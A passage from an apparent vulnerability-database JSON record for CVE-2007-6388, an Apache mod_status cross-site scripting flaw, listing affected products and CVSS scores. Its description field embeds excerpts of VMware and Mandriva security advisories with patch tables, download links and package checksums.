            "version": "1.3.37"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.52"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "interstage application server standard-j edition a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.36"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.1x86-64"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.32"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.41"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.29"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.6"
          },
          {
            "_id": null,
            "model": "2.0.60-dev",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "_id": null,
            "model": "networks self-service media processing server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.17"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "interstage application server standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "interstage studio standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.41"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.28.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3.31"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.59"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "27237"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "sp3x is credited with the discovery of this vulnerability.",
        "sources": [
          {
            "db": "BID",
            "id": "27237"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2007-6388",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2007-6388",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2007-6388",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2007-6388",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2007-6388"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Reportedly, attackers can also use this issue to redirect users\u0027 browsers to arbitrary locations, which may aid in phishing attacks. \nThe issue affects versions       prior to Apache 2.2.7-dev, 2.0.62-dev, and 1.3.40-dev. The HP Business Availability Center v8.02 kit is available on the HP Software Support Online portal at: http://support.openview.hp.com/support.jsp . Summary\n\n   Updated VMware Hosted products address security issues in libpng and\n   the Apace HTTP Server. \n\n2. Relevant releases\n\n   VMware Workstation 6.5.2 and earlier,\n   VMware Player 2.5.2 and earlier,\n   VMware ACE 2.5.2 and earlier\n\n3. Problem Description\n\n a. Third Party Library libpng Updated to 1.2.35\n\n    Several flaws were discovered in the way third party library libpng\n    handled uninitialized pointers. An attacker could create a PNG image\n    file in such a way, that when loaded by an application linked to\n    libpng, it could cause the application to crash or execute arbitrary\n    code at the privilege level of the user that runs the application. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2009-0040 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    Workstation    6.5.x     any      6.5.3 build 185404 or later\n\n    Player         2.5.x     any      2.5.3 build 185404 or later\n\n    ACE            2.5.x     any      2.5.3 build 185404 or later\n\n    Server         2.x       any      patch pending\n    Server         1.x       any      patch pending\n\n    Fusion         2.x       Mac OS/X not affected\n    Fusion         1.x       Mac OS/X not affected\n\n    ESXi           4.0       ESXi     not affected\n    ESXi           3.5       ESXi     not affected\n\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            3.0.2     ESX      not affected\n    ESX            2.5.5     ESX      not affected *\n\n    * The libpng update for the Service Console of ESX 2.5.5 is\n    documented in VMSA-2009-0007. \n\n b. Apache HTTP Server updated to 2.0.63\n\n    The new version of ACE updates the Apache HTTP Server on Windows\n    hosts to version 2.0.63 which addresses multiple security issues\n    that existed in the previous versions of this server. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752,\n    CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the\n    issues that have been addressed by this update. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    Workstation    6.5.x     any      not affected\n\n    Player         2.5.x     any      not affected\n\n    ACE            2.5.x     Windows  2.5.3 build 185404 or later\n    ACE            2.5.x     Linux    update Apache on host system *\n\n    Server         2.x       any      not affected\n    Server         1.x       any      not affected\n\n    Fusion         2.x       Mac OS/X not affected\n    Fusion         1.x       Mac OS/X not affected\n\n    ESXi           4.0       ESXi     not affected\n    ESXi           3.5       ESXi     not affected\n\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            3.0.2     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    * The Apache HTTP Server is not part of an ACE install on a Linux\n    host. Update the Apache HTTP Server on the host system to version\n    2.0.63 in order to remediate the vulnerabilities listed above. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum and/or the sha1sum of your downloaded file. \n\n   VMware Workstation 6.5.3\n   ------------------------\n   http://www.vmware.com/download/ws/\n   Release notes:\n   http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html\n\n   For Windows\n\n   Workstation for Windows 32-bit and 64-bit\n   Windows 32-bit and 64-bit .exe\n   md5sum: 7565d16b7d7e0173b90c3b76ca4656bc\n   sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1\n\n   For Linux\n\n   Workstation for Linux 32-bit\n   Linux 32-bit .rpm\n   md5sum: 4d55c491bd008ded0ea19f373d1d1fd4\n   sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e\n\n   Workstation for Linux 32-bit\n   Linux 32-bit .bundle\n   md5sum: d4a721c1918c0e8a87c6fa4bad49ad35\n   sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5\n\n   Workstation for Linux 64-bit\n   Linux 64-bit .rpm\n   md5sum: 72adfdb03de4959f044fcb983412ae7c\n   sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb\n\n   Workstation for Linux 64-bit\n   Linux 64-bit .bundle\n   md5sum: 83e1f0c94d6974286256c4d3b559e854\n   sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542\n\n\n   VMware Player 2.5.3\n   -------------------\n   http://www.vmware.com/download/player/\n   Release notes:\n   http://www.vmware.com/support/player25/doc/releasenotes_player253.html\n\n   Player for Windows binary\n\nhttp://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe\n   md5sum: fe28f193374c9457752ee16cd6cad4e7\n   sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04\n\n   Player for Linux (.rpm)\n\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm\n   md5sum: c99cd65f19fdfc7651bcb7f328b73bc2\n   sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e\n\n   Player for Linux (.bundle)\n\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle\n   md5sum: 210f4cb5615bd3b2171bc054b9b2bac5\n   sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b\n\n   Player for Linux - 64-bit (.rpm)\n\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm\n   md5sum: f91576ef90b322d83225117ae9335968\n   sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974\n\n   Player for Linux - 64-bit (.bundle)\n\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle\n   md5sum: 595d44d7945c129b1aeb679d2f001b05\n   sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4\n\n\n   VMware ACE 2.5.3\n   ----------------\n   http://www.vmware.com/download/ace/\n   Release notes:\n   http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html\n\n   ACE Management Server Virtual Appliance\n   AMS Virtual Appliance .zip\n   md5sum: 44cc7b86353047f02cf6ea0653e38418\n   sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1\n\n   VMware ACE for Windows 32-bit and 64-bit\n   Windows 32-bit and 64-bit .exe\n   md5sum: 0779da73408c5e649e0fd1c62d23820f\n   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\n\n   ACE Management Server for Windows\n   Windows .exe\n   md5sum: 0779da73408c5e649e0fd1c62d23820f\n   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\n\n   ACE Management Server for SUSE Enterprise Linux 9\n   SLES 9 .rpm\n   md5sum: a4fc92d7197f0d569361cdf4b8cca642\n   sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75\n\n   ACE Management Server for Red Hat Enterprise Linux 4\n   RHEL 4 .rpm\n   md5sum: 841005151338c8b954f08d035815fd58\n   sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e\n\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6388\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2009-08-20  VMSA-2009-0010\nInitial security advisory after release of Workstation 6.5.3,\nPlayer 2.5.3, and ACE 2.5.3 on 2009-08-20. \n\n\n- ------------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2009 VMware Inc.  All rights reserved. \n \n A flaw found in the mod_status module could lead to a cross-site\n scripting attack on sites where mod_status was enabled and the status\n pages were publically available (CVE-2007-6388). \n \n A flaw found in the mod_proxy_balancer module could lead to a\n cross-site scripting attack against an authorized user on sites where\n mod_proxy_balancer was enabled (CVE-2007-6421). \n \n Another flaw in the mod_proxy_balancer module was found where,\n on sites with the module enabled, an authorized user could send a\n carefully crafted request that would cause the apache child process\n handling the request to crash, which could lead to a denial of service\n if using a threaded MPM (CVE-2007-6422). \n \n A flaw found in the mod_proxy_ftp module could lead to a cross-site\n scripting attack against web browsers which do not correctly derive\n the response character set following the rules in RFC 2616, on sites\n where the mod_proxy_ftp module was enabled (CVE-2008-0005). \n \n The updated packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6388\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6421\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6422\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.0:\n 912f61ea5210fbb94d71eef7bb634903  2007.0/i586/apache-base-2.2.3-1.3mdv2007.0.i586.rpm\n cb04a945da63abf56db5b444a3360916  2007.0/i586/apache-devel-2.2.3-1.3mdv2007.0.i586.rpm\n f4c419b30cd6f6520d9c995b9edf7098  2007.0/i586/apache-htcacheclean-2.2.3-1.3mdv2007.0.i586.rpm\n 1a40e9af24dce5bec34c4264ae1bdce2  2007.0/i586/apache-mod_authn_dbd-2.2.3-1.3mdv2007.0.i586.rpm\n 333f116f1036dcc4a95612179f7a34bd  2007.0/i586/apache-mod_cache-2.2.3-1.3mdv2007.0.i586.rpm\n 717feaa8449934514872fde1dfb26ff8  2007.0/i586/apache-mod_dav-2.2.3-1.3mdv2007.0.i586.rpm\n 15d3661edb2fa693fcc16e890f2b25a1  2007.0/i586/apache-mod_dbd-2.2.3-1.3mdv2007.0.i586.rpm\n 90bdaeaea54a973f5e813a495d82b14b  2007.0/i586/apache-mod_deflate-2.2.3-1.3mdv2007.0.i586.rpm\n 52a5ee95962b1153467443fb608eb3d8  2007.0/i586/apache-mod_disk_cache-2.2.3-1.3mdv2007.0.i586.rpm\n 8a0a950bfe0ce68ca498761e120d05da  2007.0/i586/apache-mod_file_cache-2.2.3-1.3mdv2007.0.i586.rpm\n 4f6b84375fd94d4467a3e3088de26a80  2007.0/i586/apache-mod_ldap-2.2.3-1.3mdv2007.0.i586.rpm\n fa98d84669215b56d3f64450af0d0f5d  2007.0/i586/apache-mod_mem_cache-2.2.3-1.3mdv2007.0.i586.rpm\n 665f988fa0cc99b4b55b01565a2d3075  2007.0/i586/apache-mod_proxy-2.2.3-1.3mdv2007.0.i586.rpm\n a22e15e33709ec0fff4c453643094031  2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.3mdv2007.0.i586.rpm\n cca659746b2601dc61f8382c64d40206  2007.0/i586/apache-mod_ssl-2.2.3-1.3mdv2007.0.i586.rpm\n 208d8db690290b848c266593324c2a75  2007.0/i586/apache-mod_userdir-2.2.3-1.3mdv2007.0.i586.rpm\n 92a1be6ec8e7a0b274666ea7b2c8c47f  2007.0/i586/apache-modules-2.2.3-1.3mdv2007.0.i586.rpm\n 71670f17ade1c090567f4850c796bdef  2007.0/i586/apache-mpm-prefork-2.2.3-1.3mdv2007.0.i586.rpm\n dd78ed04d011e11e8872c606d4edfa93  2007.0/i586/apache-mpm-worker-2.2.3-1.3mdv2007.0.i586.rpm\n eb5785a9e04f14ac7788d43d18c39fcc  2007.0/i586/apache-source-2.2.3-1.3mdv2007.0.i586.rpm \n f066c405e8993de4fa506d8c05d37b9e  2007.0/SRPMS/apache-2.2.3-1.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n b25f0ae69e8be8c807afb36a5b58e4a7  2007.0/x86_64/apache-base-2.2.3-1.3mdv2007.0.x86_64.rpm\n ec93723ef9b7a5e62dc6704461e2b034  2007.0/x86_64/apache-devel-2.2.3-1.3mdv2007.0.x86_64.rpm\n 200fac36fbd67d6cd1857272aa5147e7  2007.0/x86_64/apache-htcacheclean-2.2.3-1.3mdv2007.0.x86_64.rpm\n ac7ec3a712d56ce1a076f29439c042d4  2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.3mdv2007.0.x86_64.rpm\n 126f880a37723b316f13f01c612883c5  2007.0/x86_64/apache-mod_cache-2.2.3-1.3mdv2007.0.x86_64.rpm\n 69460daf3173b6c9f0d9f84c3597d81a  2007.0/x86_64/apache-mod_dav-2.2.3-1.3mdv2007.0.x86_64.rpm\n 52cf72324ae29121fe2e2c955808791f  2007.0/x86_64/apache-mod_dbd-2.2.3-1.3mdv2007.0.x86_64.rpm\n 17517cc4f69dec1f4ba1c08b242526e4  2007.0/x86_64/apache-mod_deflate-2.2.3-1.3mdv2007.0.x86_64.rpm\n a5a27827a3f488b9f31a231aad43eae7  2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.3mdv2007.0.x86_64.rpm\n f413791db00e648dc0fae00336340bf0  2007.0/x86_64/apache-mod_file_cache-2.2.3-1.3mdv2007.0.x86_64.rpm\n 9d74a9b5ff153557cf361ca1726fd9b1  2007.0/x86_64/apache-mod_ldap-2.2.3-1.3mdv2007.0.x86_64.rpm\n b8fde6545785d79344d5a85b7bd88903  2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.3mdv2007.0.x86_64.rpm\n da3a732c1e41e62207085aefcd0fb99c  2007.0/x86_64/apache-mod_proxy-2.2.3-1.3mdv2007.0.x86_64.rpm\n df716921b9736859a712dea86b22c3f5  2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.3mdv2007.0.x86_64.rpm\n c69fd37756dbe81df897396e6c6413de  2007.0/x86_64/apache-mod_ssl-2.2.3-1.3mdv2007.0.x86_64.rpm\n a24b51c168be4a5d57a1d1b5a1401f83  2007.0/x86_64/apache-mod_userdir-2.2.3-1.3mdv2007.0.x86_64.rpm\n e481d9ceb7ffa6a6299417a6f7874c07  2007.0/x86_64/apache-modules-2.2.3-1.3mdv2007.0.x86_64.rpm\n 0917c7d2edab62a4c62e4dd6136dec93  2007.0/x86_64/apache-mpm-prefork-2.2.3-1.3mdv2007.0.x86_64.rpm\n a98b13300b903a0219dc9de626ea1bbe  2007.0/x86_64/apache-mpm-worker-2.2.3-1.3mdv2007.0.x86_64.rpm\n e83551cd2c8365788b767f90c204a13d  2007.0/x86_64/apache-source-2.2.3-1.3mdv2007.0.x86_64.rpm \n f066c405e8993de4fa506d8c05d37b9e  2007.0/SRPMS/apache-2.2.3-1.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.1:\n cb95db6136cbe28610e3e9baab45abeb  2007.1/i586/apache-base-2.2.4-6.4mdv2007.1.i586.rpm\n 6f9a4f9e658d51acdb9b8230a3ff8d10  2007.1/i586/apache-devel-2.2.4-6.4mdv2007.1.i586.rpm\n 71499b6f32722a7af4b664849eac6320  2007.1/i586/apache-htcacheclean-2.2.4-6.4mdv2007.1.i586.rpm\n 4c747fdb75063c7bb9bd50c0dbc59a5b  2007.1/i586/apache-mod_authn_dbd-2.2.4-6.4mdv2007.1.i586.rpm\n a3cae606ac80d807f84177c60e8455c8  2007.1/i586/apache-mod_cache-2.2.4-6.4mdv2007.1.i586.rpm\n 0f518e3f63d47d1c5a8193d95030f52d  2007.1/i586/apache-mod_dav-2.2.4-6.4mdv2007.1.i586.rpm\n 3ad5c633a0dcc187aad028f48dfb5b92  2007.1/i586/apache-mod_dbd-2.2.4-6.4mdv2007.1.i586.rpm\n 5fa41f5ac0caecb71c639f78222d8cee  2007.1/i586/apache-mod_deflate-2.2.4-6.4mdv2007.1.i586.rpm\n 1b4b5d31d1596eaa30987921d0ab07be  2007.1/i586/apache-mod_disk_cache-2.2.4-6.4mdv2007.1.i586.rpm\n 597eb4248325c05c1fafae90378425d6  2007.1/i586/apache-mod_file_cache-2.2.4-6.4mdv2007.1.i586.rpm\n f868cb2c42e06ae77fe349c7d31e0958  2007.1/i586/apache-mod_ldap-2.2.4-6.4mdv2007.1.i586.rpm\n a8696226c9930799d1fbad199c5e7084  2007.1/i586/apache-mod_mem_cache-2.2.4-6.4mdv2007.1.i586.rpm\n 2b62f69a3f58f1c572cbd8e961c11043  2007.1/i586/apache-mod_proxy-2.2.4-6.4mdv2007.1.i586.rpm\n bea2a28dc594b5fb8ef0591a7bb91714  2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.4mdv2007.1.i586.rpm\n 9719faa4845deef9dc95f4ceeefce0e6  2007.1/i586/apache-mod_ssl-2.2.4-6.4mdv2007.1.i586.rpm\n 938e503476cac7f68b57322494e8f471  2007.1/i586/apache-mod_userdir-2.2.4-6.4mdv2007.1.i586.rpm\n cd01ff99ebacfe90c317d253d7ac11c4  2007.1/i586/apache-modules-2.2.4-6.4mdv2007.1.i586.rpm\n 5d830472142486b008e84851f5befdf9  2007.1/i586/apache-mpm-event-2.2.4-6.4mdv2007.1.i586.rpm\n 48ec7cbe8edbd745cc8446f2d274d8b7  2007.1/i586/apache-mpm-itk-2.2.4-6.4mdv2007.1.i586.rpm\n ada3666e18e2c49eb4849afbdad60f75  2007.1/i586/apache-mpm-prefork-2.2.4-6.4mdv2007.1.i586.rpm\n 7830123c1e76e8d02ca0a140c2b5f6c6  2007.1/i586/apache-mpm-worker-2.2.4-6.4mdv2007.1.i586.rpm\n 6498cc5113689f513cbdcfae0a2a3ad4  2007.1/i586/apache-source-2.2.4-6.4mdv2007.1.i586.rpm \n a716565584726e4d2d94ca4796c1d403  2007.1/SRPMS/apache-2.2.4-6.4mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n 839816f464191d3aff0882eac70cea40  2007.1/x86_64/apache-base-2.2.4-6.4mdv2007.1.x86_64.rpm\n ac4910f34cbf168df34cd123604b044b  2007.1/x86_64/apache-devel-2.2.4-6.4mdv2007.1.x86_64.rpm\n a4b4f9d518ed8621348527938f6a8230  2007.1/x86_64/apache-htcacheclean-2.2.4-6.4mdv2007.1.x86_64.rpm\n d554aa06a52bd72e20f035beedd50dcf  2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.4mdv2007.1.x86_64.rpm\n 68659f413d0b1102c220b1b4824489b6  2007.1/x86_64/apache-mod_cache-2.2.4-6.4mdv2007.1.x86_64.rpm\n d92ec9a9deb7d188e644075a18951ae6  2007.1/x86_64/apache-mod_dav-2.2.4-6.4mdv2007.1.x86_64.rpm\n 07b06f6de52f0f107106cead6f47de2c  2007.1/x86_64/apache-mod_dbd-2.2.4-6.4mdv2007.1.x86_64.rpm\n 6bf077871aa95d08c934eacac7f1291e  2007.1/x86_64/apache-mod_deflate-2.2.4-6.4mdv2007.1.x86_64.rpm\n b16f793759b09e75b7e162a5d858d835  2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.4mdv2007.1.x86_64.rpm\n 635452cc08657fa5da5b65dc40bf2c1b  2007.1/x86_64/apache-mod_file_cache-2.2.4-6.4mdv2007.1.x86_64.rpm\n 7a238972b773975493d8931d573233ec  2007.1/x86_64/apache-mod_ldap-2.2.4-6.4mdv2007.1.x86_64.rpm\n 46704ca76800a5b967a4dd6e8efef986  2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.4mdv2007.1.x86_64.rpm\n 3c23cff577f9697b719c90918ef91b44  2007.1/x86_64/apache-mod_proxy-2.2.4-6.4mdv2007.1.x86_64.rpm\n c4ea096a86cdab894cb59bb868b849f0  2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.4mdv2007.1.x86_64.rpm\n 01f40dde7c3c93606c82681af472815f  2007.1/x86_64/apache-mod_ssl-2.2.4-6.4mdv2007.1.x86_64.rpm\n 9ade922fc7d52d73a47ca5f3cb2c7525  2007.1/x86_64/apache-mod_userdir-2.2.4-6.4mdv2007.1.x86_64.rpm\n 5e7e44ef5703f1e4fe5a952e5a3f5239  2007.1/x86_64/apache-modules-2.2.4-6.4mdv2007.1.x86_64.rpm\n e1b06e559e600461e19f9ab0f21d94be  2007.1/x86_64/apache-mpm-event-2.2.4-6.4mdv2007.1.x86_64.rpm\n 9903bcc1c12a86a9c2f9483d0ef9685e  2007.1/x86_64/apache-mpm-itk-2.2.4-6.4mdv2007.1.x86_64.rpm\n ce244cc42b6c411d2e3264c6ac6e1a76  2007.1/x86_64/apache-mpm-prefork-2.2.4-6.4mdv2007.1.x86_64.rpm\n 5989a935f4a0e20ac2844982e81cda83  2007.1/x86_64/apache-mpm-worker-2.2.4-6.4mdv2007.1.x86_64.rpm\n 339fccde52210eca1bf7e3cf05b9ce0e  2007.1/x86_64/apache-source-2.2.4-6.4mdv2007.1.x86_64.rpm \n a716565584726e4d2d94ca4796c1d403  2007.1/SRPMS/apache-2.2.4-6.4mdv2007.1.src.rpm\n\n Mandriva Linux 2008.0:\n cb013d3f4f40e2dfe6a90e0a2a7cdd74  2008.0/i586/apache-base-2.2.6-8.1mdv2008.0.i586.rpm\n f2e8d6e8191794fac34ddc7fc0f38588  2008.0/i586/apache-devel-2.2.6-8.1mdv2008.0.i586.rpm\n 8456184db4de115db70e603dbe252456  2008.0/i586/apache-htcacheclean-2.2.6-8.1mdv2008.0.i586.rpm\n 9e8861daffdf9d6b0ab431b1c3c1fac9  2008.0/i586/apache-mod_authn_dbd-2.2.6-8.1mdv2008.0.i586.rpm\n de1f407b2eb4d84140686375d3497006  2008.0/i586/apache-mod_cache-2.2.6-8.1mdv2008.0.i586.rpm\n eaf010272f97a507f37a6145bb9de809  2008.0/i586/apache-mod_dav-2.2.6-8.1mdv2008.0.i586.rpm\n 4d1073009151607b47ffcedc96cdb834  